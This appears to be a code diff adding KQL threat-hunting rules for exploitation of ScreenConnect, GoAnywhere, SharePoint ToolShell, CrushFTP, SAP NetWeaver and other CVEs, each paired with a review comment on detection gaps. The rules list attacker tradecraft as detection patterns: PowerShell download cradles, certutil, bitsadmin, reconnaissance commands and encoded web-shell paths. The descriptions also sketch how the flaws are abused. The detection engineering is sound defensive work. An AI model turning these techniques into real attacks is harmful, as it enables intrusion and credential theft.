@@ -0,0 +1,10 @@ +// Title: ScreenConnect - SlashAndGrab Exploitation Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-02-23 +// Level: high +// Description: Detects indicators of exploitation by threat actors during exploitation of the "SlashAndGrab" vulnerability related to ScreenConnect as reported Team Huntress +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, detection.emerging-threats + +DeviceFileEvents +| where (FolderPath contains "C:\\Windows\\Temp\\ScreenConnect\\" and FolderPath contains "\\LB3.exe") or (FolderPath contains "C:\\mpyutd.msi" or FolderPath contains "C:\\perflogs\\RunSchedulerTaskOnce.ps1" or FolderPath contains "C:\\ProgramData\\1.msi" or FolderPath contains "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\mpyutd.msi" or FolderPath contains "C:\\ProgramData\\update.dat" or FolderPath contains "C:\\Users\\oldadmin\\Documents\\MilsoftConnect\\Files\\ta.exe" or FolderPath contains "C:\\Windows\\Help\\Help\\SentinelAgentCore.dll" or FolderPath contains "C:\\Windows\\Help\\Help\\SentinelUI.exe" or FolderPath contains "C:\\Windows\\spsrv.exe" or FolderPath contains "C:\\Windows\\Temp\\svchost.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-10035/potential_exploitation_of_goanywhere_mft_vulnerability.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-10035/potential_exploitation_of_goanywhere_mft_vulnerability.kql new file mode 100644 index 00000000..d330dbb9 --- /dev/null +++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-10035/potential_exploitation_of_goanywhere_mft_vulnerability.kql 
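Review bot: Every indicator here is a fixed path, one of them inside a specific user profile (`C:\Users\oldadmin\Documents\MilsoftConnect\Files\ta.exe`), so the rule matches only a re-run of this exact campaign and is defeated by a rename. The one behavioural element, an executable dropped into `C:\Windows\Temp\ScreenConnect\`, is narrowed to `LB3.exe`; `FolderPath contains "C:\\Windows\\Temp\\ScreenConnect\\" and FolderPath endswith ".exe"` would cover re-tooled payloads, at the cost of some noise from legitimate ScreenConnect extensions or updates that I have not verified. Treat this as a retrospective hunting query and pair it with a behavioural rule on ScreenConnect child processes.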
@@ -0,0 +1,13 @@ +// Title: Potential Exploitation of GoAnywhere MFT Vulnerability +// Author: MSFT (idea), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-07 +// Level: high +// Description: Detects suspicious command execution by child processes of the GoAnywhere Managed File Transfer (MFT) application, which may indicate exploitation such as CVE-2025-10035. +// This behavior is indicative of post-exploitation activity related to CVE-2025-10035, as observed in campaigns by the threat actor Storm-1175. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1059.001, attack.persistence, attack.t1133, detection.emerging-threats, cve.2025-10035 +// False Positives: +// - Legitimate administrative scripts or built-in GoAnywhere functions could potentially trigger this rule. Tuning may be required based on normal activity in your environment. + +DeviceProcessEvents +| where InitiatingProcessFolderPath contains "\\GoAnywhere\\tomcat\\" and ((((ProcessCommandLine contains "IEX" and ProcessCommandLine contains "enc" and ProcessCommandLine contains "Hidden" and ProcessCommandLine contains "bypass") or (ProcessCommandLine matches regex "net\\s+user" or ProcessCommandLine matches regex "net\\s+group" or ProcessCommandLine matches regex "query\\s+session") or (ProcessCommandLine contains "whoami" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "dsquery" or ProcessCommandLine contains "localgroup administrators" or ProcessCommandLine contains "nltest" or ProcessCommandLine contains "samaccountname=" or ProcessCommandLine contains "adscredentials" or ProcessCommandLine contains "o365accountconfiguration" or ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "FromBase64String(" or ProcessCommandLine contains "System.IO.Compression" or ProcessCommandLine contains "System.IO.MemoryStream" or ProcessCommandLine 
contains "curl")) and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe")) or (((ProcessCommandLine contains "powershell" or ProcessCommandLine contains "whoami" or ProcessCommandLine contains "net.exe" or ProcessCommandLine contains "net1.exe" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "quser" or ProcessCommandLine contains "nltest" or ProcessCommandLine contains "curl") and FolderPath endswith "\\cmd.exe") or (ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wscript"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-24054/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-24054/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql new file mode 100644 index 00000000..1e7d290c --- /dev/null +++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-24054/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql 
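Review bot: The three `matches regex` tests (`net\s+user`, `net\s+group`, `query\s+session`) are case-sensitive in KQL while every surrounding `contains` is case-insensitive, so `NET USER` or `Net Group` slips through this branch even though `WHOAMI` is caught. Prefix the patterns, e.g. `ProcessCommandLine matches regex "(?i)net\\s+user"`, or replace them with `contains "net user"` if a single space is acceptable. The `InitiatingProcessFolderPath contains "\\GoAnywhere\\tomcat\\"` anchor presumes the default install layout — confirm it matches the Tomcat image path your deployment actually shows.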
@@ -0,0 +1,14 @@ +// Title: Suspicious Creation of .library-ms File — Potential CVE-2025-24054 Exploit +// Author: Gene Kazimiarovich +// Date: 2025-04-20 +// Level: medium +// Description: Detects creation of '.library-ms' files, which may indicate exploitation of CVE-2025-24054. This vulnerability allows an attacker to trigger an automatic outbound SMB or WebDAV authentication request to a remote server upon archive extraction. +// If the system is unpatched, no user interaction is required beyond extracting a malicious archive—potentially exposing the user's NTLMv2-SSP hash to the attacker. +// MITRE Tactic: Credential Access +// Tags: detection.emerging-threats, attack.credential-access, attack.t1187, cve.2025-24054 +// False Positives: +// - Legitimate Library shortcuts under %APPDATA%\Microsoft\Windows\Libraries\ (rarely created by end-users) +// - Custom corporate scripts that programmatically generate .library-ms Files + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\7z.exe" or InitiatingProcessFolderPath endswith "\\winrar.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe") and FolderPath endswith ".library-ms" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-30406/suspicious_process_spawned_by_centrestack_portal_apppool.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-30406/suspicious_process_spawned_by_centrestack_portal_apppool.kql new file mode 100644 index 00000000..0f4c8646 --- /dev/null +++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-30406/suspicious_process_spawned_by_centrestack_portal_apppool.kql 
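Review bot: The false-positive note already names `%APPDATA%\Microsoft\Windows\Libraries\` as the legitimate home of `.library-ms` files, yet the query does not exclude it, so Explorer creating a library there fires exactly like the archive-extraction case the rule is after. Add `and not (FolderPath contains "\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\")`, and `ActionType == "FileCreated"` so that renames and deletions of existing libraries do not re-trigger. Note that `explorer.exe` is also the parent for Windows' built-in zip extraction, so without that exclusion the alert cannot separate a malicious archive from a user-made library.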
@@ -0,0 +1,12 @@ +// Title: Suspicious Process Spawned by CentreStack Portal AppPool +// Author: Jason Rathbun (Blackpoint Cyber) +// Date: 2025-04-17 +// Level: high +// Description: Detects unexpected command shell execution (cmd.exe) from w3wp.exe when tied to CentreStack's portal.config, indicating potential exploitation (e.g., CVE-2025-30406) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.t1059.003, attack.t1505.003, cve.2025-30406, detection.emerging-threats +// False Positives: +// - Potentially if other portal services run on w3wp with a apppool\portal\portal.config, if you want to increase scope you could add user IIS APPPOOL\portal. + +DeviceProcessEvents +| where FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine contains "\\portal\\portal.config" and InitiatingProcessFolderPath endswith "\\w3wp.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31161/suspicious_crushftp_child_process.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31161/suspicious_crushftp_child_process.kql new file mode 100644 index 00000000..803f6d95 --- /dev/null +++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31161/suspicious_crushftp_child_process.kql 
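Review bot: The rule fires only when the child image is `cmd.exe`, whereas a command injected through the same `w3wp.exe` worker can just as easily spawn `powershell.exe` or `pwsh.exe` directly; the CrushFTP and GoAnywhere rules in this same batch list a broader child set. Consider `(FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")` while keeping the `\\portal\\portal.config` parent anchor as the specific signal. The false-positive note suggests scoping by the `IIS APPPOOL\portal` identity; `InitiatingProcessAccountName` is the column for that, if it is populated consistently in your tenant.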
@@ -0,0 +1,15 @@ +// Title: Suspicious CrushFTP Child Process +// Author: Craig Sweeney, Matt Anderson, Jose Oregon, Tim Kasper, Faith Stratton, Samantha Shaw, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-04-10 +// Level: medium +// Description: Detects suspicious child processes spawned by the CrushFTP service that may indicate exploitation of remote code execution vulnerabilities such as +// CVE-2025-31161, where attackers can achieve RCE through crafted HTTP requests. +// The detection focuses on commonly abused Windows executables (like powershell.exe, cmd.exe etc.) that attackers typically use post-exploitation to execute malicious commands. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1190, cve.2025-31161, detection.emerging-threats +// False Positives: +// - Legitimate CrushFTP administrative actions +// - Software updates + +DeviceProcessEvents +| where (FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\crushftpservice.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31324/potential_sap_netweaver_webshell_creation.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31324/potential_sap_netweaver_webshell_creation.kql new file mode 100644 index 00000000..c1b9e1cc --- /dev/null +++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31324/potential_sap_netweaver_webshell_creation.kql 
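Review bot: The parent anchor is `\\crushftpservice.exe` only, while the CVE-2025-54309 rule later in this batch anchors on `\\crushftp.exe`; each rule therefore misses the deployment form the other covers, and a CrushFTP started as a plain Java process (presumably `java.exe` with the CrushFTP jar) matches neither. Consider `(InitiatingProcessFolderPath endswith "\\crushftpservice.exe" or InitiatingProcessFolderPath endswith "\\crushftp.exe")` in both rules, and confirm on a real install which image name your hosts show. The child list is reasonable; `rundll32.exe`, `regsvr32.exe`, `certutil.exe` and `bitsadmin.exe` would line it up with the sibling rule.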
@@ -0,0 +1,13 @@ +// Title: Potential SAP NetWeaver Webshell Creation +// Author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-04-28 +// Level: medium +// Description: Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories, +// which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.initial-access, attack.t1190, attack.persistence, attack.t1059.003, cve.2025-31324, detection.emerging-threats +// False Positives: +// - Legitimate creation of jsc or java files in these locations + +DeviceFileEvents +| where (FolderPath endswith ".jsp" or FolderPath endswith ".java" or FolderPath endswith ".class") and (FolderPath contains "\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\work" or FolderPath contains "\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\root") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31324/potential_sap_netweaver_webshell_creation_linux.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31324/potential_sap_netweaver_webshell_creation_linux.kql new file mode 100644 index 00000000..743b351e --- /dev/null +++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31324/potential_sap_netweaver_webshell_creation_linux.kql 
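Review bot: The Windows path fragments `\\irj\\work` and `\\irj\\root` lack the trailing separator the Linux twin of this rule uses, so they also match any sibling directory whose name merely starts with `work` or `root`; `\\irj\\work\\` and `\\irj\\root\\` would mirror the Linux rule exactly. Separately, `work` is presumably where the engine writes compiled JSP output, so `.java`/`.class` creations there will occur for every legitimate JSP as well — expect a baseline, and treat the `.jsp` drop under `root` as the stronger CVE-2025-31324 signal. The false-positive line says `jsc`; presumably `jsp` was meant.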
@@ -0,0 +1,13 @@ +// Title: Potential SAP NetWeaver Webshell Creation - Linux +// Author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-04-28 +// Level: medium +// Description: Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories, +// which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.initial-access, attack.t1190, attack.persistence, attack.t1059.003, cve.2025-31324, detection.emerging-threats +// False Positives: +// - Legitimate creation of jsc or java files in these locations + +DeviceFileEvents +| where (FolderPath endswith ".jsp" or FolderPath endswith ".java" or FolderPath endswith ".class") and (FolderPath contains "/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work/" or FolderPath contains "/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-32463/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-32463/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql new file mode 100644 index 00000000..88d627da --- /dev/null +++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-32463/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql 
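Review bot: The query has no `ActionType` filter, so every modification, rename or deletion of an existing `.jsp`/`.java`/`.class` under these directories fires as well, not only the creation the title promises; add `ActionType == "FileCreated"` (DeviceFileEvents on Linux uses the same action values as far as I know — verify in your tenant). The false-positive line reads `jsc`; presumably `jsp`. Since this is byte-identical to the Windows rule apart from the separator, the two could be merged with `has_any` over both path forms if the generator allows it, which avoids the two drifting apart.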
@@ -0,0 +1,15 @@ +// Title: Non-Standard Nsswitch.Conf Creation - Potential CVE-2025-32463 Exploitation +// Author: Swachchhanda Shrawn Poudel (Nextron Systems) +// Date: 2025-10-02 +// Level: high +// Description: Detects the creation of nsswitch.conf files in non-standard directories, which may indicate exploitation of CVE-2025-32463. +// This vulnerability requires an attacker to create a nsswitch.conf in a directory that will be used during sudo chroot operations. +// When sudo executes, it loads malicious shared libraries from user-controlled locations within the chroot environment, +// potentially leading to arbitrary code execution and privilege escalation. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068, cve.2025-32463, detection.emerging-threats +// False Positives: +// - Backup locations + +DeviceFileEvents +| where FolderPath endswith "/etc/nsswitch.conf" and (not(FolderPath =~ "/etc/nsswitch.conf")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-33053/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-33053/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql new file mode 100644 index 00000000..da63671e --- /dev/null +++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-33053/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql 
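Review bot: Besides "Backup locations", `endswith "/etc/nsswitch.conf"` will hit every container root filesystem and chroot that carries its own `etc/` — Docker/containerd layers under `/var/lib/docker/` and `/var/lib/containerd/`, snap and flatpak runtimes, debootstrap build trees — which on a container host is a far larger false-positive source than backups; I have not measured it, but the path shape makes it inevitable. Consider excluding those prefixes, e.g. `and not (FolderPath startswith "/var/lib/docker/" or FolderPath startswith "/var/lib/containerd/" or FolderPath startswith "/snap/")`, and adding `ActionType == "FileCreated"` to match the description. The `=~` exclusion of the real `/etc/nsswitch.conf` is correct as written.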
@@ -0,0 +1,12 @@ +// Title: Potential Exploitation of RCE Vulnerability CVE-2025-33053 - Image Load +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-06-13 +// Level: high +// Description: Detects potential exploitation of remote code execution vulnerability CVE-2025-33053 +// by monitoring suspicious image loads from WebDAV paths. The exploit involves malicious executables from +// attacker-controlled WebDAV servers loading the Windows system DLLs like gdi32.dll, netapi32.dll, etc. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1105, detection.emerging-threats, cve.2025-33053 + +DeviceImageLoadEvents +| where (InitiatingProcessFolderPath endswith "\\route.exe" or InitiatingProcessFolderPath endswith "\\netsh.exe" or InitiatingProcessFolderPath endswith "\\makecab.exe" or InitiatingProcessFolderPath endswith "\\dxdiag.exe" or InitiatingProcessFolderPath endswith "\\ipconfig.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe") and (InitiatingProcessFolderPath contains "\\DavWWWRoot\\" and InitiatingProcessFolderPath startswith "\\\\") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-49144/potential_notepad_cve_2025_49144_exploitation.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-49144/potential_notepad_cve_2025_49144_exploitation.kql new file mode 100644 index 00000000..49dd5d56 --- /dev/null +++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-49144/potential_notepad_cve_2025_49144_exploitation.kql 
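Review bot: Every predicate is on `InitiatingProcessFolderPath`, so nothing constrains the loaded image and one process running from a `\\...\DavWWWRoot\` path yields an alert per DLL it loads, although the description singles out `gdi32.dll`/`netapi32.dll`. Either add a `FileName` condition on the loaded image, or `| summarize by DeviceId, InitiatingProcessId, InitiatingProcessFolderPath` so the analyst sees one row per process. A DeviceProcessEvents twin keyed on `FolderPath startswith "\\\\" and FolderPath contains "\\DavWWWRoot\\"` would catch the launch itself without depending on image-load telemetry, which is sampled more sparingly than process creation on many tenants.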
@@ -0,0 +1,12 @@ +// Title: Potential Notepad++ CVE-2025-49144 Exploitation +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-06-26 +// Level: high +// Description: Detects potential exploitation of CVE-2025-49144, a local privilege escalation vulnerability in Notepad++ installers (v8.8.1 and prior) where the installer calls regsvr32.exe without specifying the full path. +// This allows an attacker to execute arbitrary code with elevated privileges by placing a malicious regsvr32.exe alongside this Legitimate Notepad++ installer. +// The vulnerability is triggered when the installer attempts to register the NppShell.dll file, which is a component of Notepad++. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.008, cve.2025-49144, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\contextMenu\\NppShell.dll" and ProcessCommandLine startswith "regsvr32 /s" and FolderPath endswith "\\regsvr32.exe") and (not((FolderPath in~ ("C:\\Windows\\System32\\regsvr32.exe", "C:\\Windows\\SysWOW64\\regsvr32.exe")))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-53770/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-53770/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql new file mode 100644 index 00000000..efdc47dd --- /dev/null +++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-53770/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql 
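Review bot: The benign-path exclusion compares `FolderPath` against two literal `C:\Windows\...` paths, so a host whose system volume is not `C:` would have its legitimate `regsvr32.exe` flagged; rare, but worth knowing when the rule is rated `high`. Keeping the exact-path form is still the right call, since a suffix match such as `endswith "\\Windows\\System32\\regsvr32.exe"` could be satisfied by an attacker-created `...\evil\Windows\System32\` tree. Whether the installer's command line is always literally `regsvr32 /s ...`, which the `startswith` depends on, I cannot confirm from the hunk.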
@@ -0,0 +1,11 @@ +// Title: Potential SharePoint ToolShell CVE-2025-53770 Exploitation - File Create +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-07-21 +// Level: critical +// Description: Detects the creation of file such as spinstall0.aspx which may indicate successful exploitation of CVE-2025-53770. +// CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, cve.2025-53770, detection.emerging-threats + +DeviceFileEvents +| where (FolderPath contains "\\15\\TEMPLATE\\LAYOUTS\\" or FolderPath contains "\\16\\TEMPLATE\\LAYOUTS\\") and (FolderPath endswith "\\spinstall.aspx" or (FolderPath contains "\\spinstall" and FolderPath contains ".aspx") or FolderPath endswith "\\debug_dev.js") and (FolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\" or FolderPath startswith "C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Web Server Extensions\\") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-53770/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-53770/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql new file mode 100644 index 00000000..138d6269 --- /dev/null +++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-53770/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql 
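Review bot: The file names (`spinstall*.aspx`, `debug_dev.js`) are the ones reported for the initial wave and are trivially renamed, so a rule rated `critical` keyed on them goes quiet as soon as the tooling changes. The durable signal in the same event is the writer: keep this rule, but pair it with `InitiatingProcessFolderPath endswith "\\w3wp.exe" and FolderPath endswith ".aspx"` under the same `LAYOUTS` prefix, which catches any web shell dropped by the SharePoint worker regardless of name. Adding `ActionType == "FileCreated"` would also stop cleanup or modification of an already-alerted file from re-firing.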
@@ -0,0 +1,11 @@ +// Title: Potential SharePoint ToolShell CVE-2025-53770 Exploitation Indicators +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-07-21 +// Level: high +// Description: Detects potential exploitation of CVE-2025-53770 by identifying indicators such as suspicious command lines discovered in Post-Exploitation activities. +// CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, cve.2025-53770, detection.emerging-threats + +DeviceProcessEvents +| where (InitiatingProcessFolderPath endswith "\\w3wp.exe" and ((ProcessCommandLine contains "cwBwAGkAbgBzAHQAYQBsAGwAMAAuAGEAcwBwAHgA" or ProcessCommandLine contains "MAcABpAG4AcwB0AGEAbABsADAALgBhAHMAcAB4A" or ProcessCommandLine contains "zAHAAaQBuAHMAdABhAGwAbAAwAC4AYQBzAHAAeA" or ProcessCommandLine contains "c3BpbnN0YWxsMC5hc3B4") or (ProcessCommandLine contains "OgBcAFAAUgBPAEcAUgBBAH4AMQBcAEMATwBNAE0ATwBOAH4AMQBcAE0ASQBDAFIATwBTAH4AMQBcAFcARQBCAFMARQBSAH4AMQBcADEANQBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains "oAXABQAFIATwBHAFIAQQB+ADEAXABDAE8ATQBNAE8ATgB+ADEAXABNAEkAQwBSAE8AUwB+ADEAXABXAEUAQgBTAEUAUgB+ADEAXAAxADUAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains "6AFwAUABSAE8ARwBSAEEAfgAxAFwAQwBPAE0ATQBPAE4AfgAxAFwATQBJAEMAUgBPAFMAfgAxAFwAVwBFAEIAUwBFAFIAfgAxAFwAMQA1AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw" or ProcessCommandLine contains "OgBcAFAAUgBPAEcAUgBBAH4AMQBcAEMATwBNAE0ATwBOAH4AMQBcAE0ASQBDAFIATwBTAH4AMQBcAFcARQBCAFMARQBSAH4AMQBcADEANgBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains "oAXABQAFIATwBHAFIAQQB+ADEAXABDAE8ATQBNAE8ATgB+ADEAXABNAEkAQwBSAE8AUwB+ADEAXABXAEUAQgBTAEUAUgB+ADEAXAAxADYAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains 
"6AFwAUABSAE8ARwBSAEEAfgAxAFwAQwBPAE0ATQBPAE4AfgAxAFwATQBJAEMAUgBPAFMAfgAxAFwAVwBFAEIAUwBFAFIAfgAxAFwAMQA2AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw" or ProcessCommandLine contains "OgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABDAG8AbQBtAG8AbgAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0ACAAUwBoAGEAcgBlAGQAXABXAGUAYgAgAFMAZQByAHYAZQByACAARQB4AHQAZQBuAHMAaQBvAG4AcwBcADEANQBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains "oAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwAQwBvAG0AbQBvAG4AIABGAGkAbABlAHMAXABNAGkAYwByAG8AcwBvAGYAdAAgAFMAaABhAHIAZQBkAFwAVwBlAGIAIABTAGUAcgB2AGUAcgAgAEUAeAB0AGUAbgBzAGkAbwBuAHMAXAAxADUAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains "6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEMAbwBtAG0AbwBuACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAIABTAGgAYQByAGUAZABcAFcAZQBiACAAUwBlAHIAdgBlAHIAIABFAHgAdABlAG4AcwBpAG8AbgBzAFwAMQA1AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw" or ProcessCommandLine contains "OgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABDAG8AbQBtAG8AbgAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0ACAAUwBoAGEAcgBlAGQAXABXAGUAYgAgAFMAZQByAHYAZQByACAARQB4AHQAZQBuAHMAaQBvAG4AcwBcADEANgBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains "oAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwAQwBvAG0AbQBvAG4AIABGAGkAbABlAHMAXABNAGkAYwByAG8AcwBvAGYAdAAgAFMAaABhAHIAZQBkAFwAVwBlAGIAIABTAGUAcgB2AGUAcgAgAEUAeAB0AGUAbgBzAGkAbwBuAHMAXAAxADYAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains "6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEMAbwBtAG0AbwBuACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAIABTAGgAYQByAGUAZABcAFcAZQBiACAAUwBlAHIAdgBlAHIAIABFAHgAdABlAG4AcwBpAG8AbgBzAFwAMQA2AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw"))) or (ProcessCommandLine contains "-EncodedCommand JABiAGEAcwBlADYANABTAHQAcgBpAG4AZwAgAD0" or ProcessCommandLine contains "TEMPLATE\\LAYOUTS\\spinstall0.aspx") \ No newline at end of file 
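Review bot: The last branch requires the literal prefix `-EncodedCommand ` in front of the base64 fragment, but PowerShell accepts `-enc`, `-ec`, `-e` and other abbreviations, so the same payload launched as `-enc JABiAGEAcwBl...` is not matched; match `ProcessCommandLine contains "JABiAGEAcwBlADYANABTAHQAcgBpAG4AZwAgAD0"` on its own. If my UTF-16LE decode is right that fragment is `$base64String =`, a variable name from the public exploit, so it is a weak indicator that renaming the variable defeats. The three rotated UTF-16LE encodings of `spinstall0.aspx` and of the `LAYOUTS` paths are handled correctly, and the `w3wp.exe` parent anchor is the part of this rule worth keeping regardless of indicator churn.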
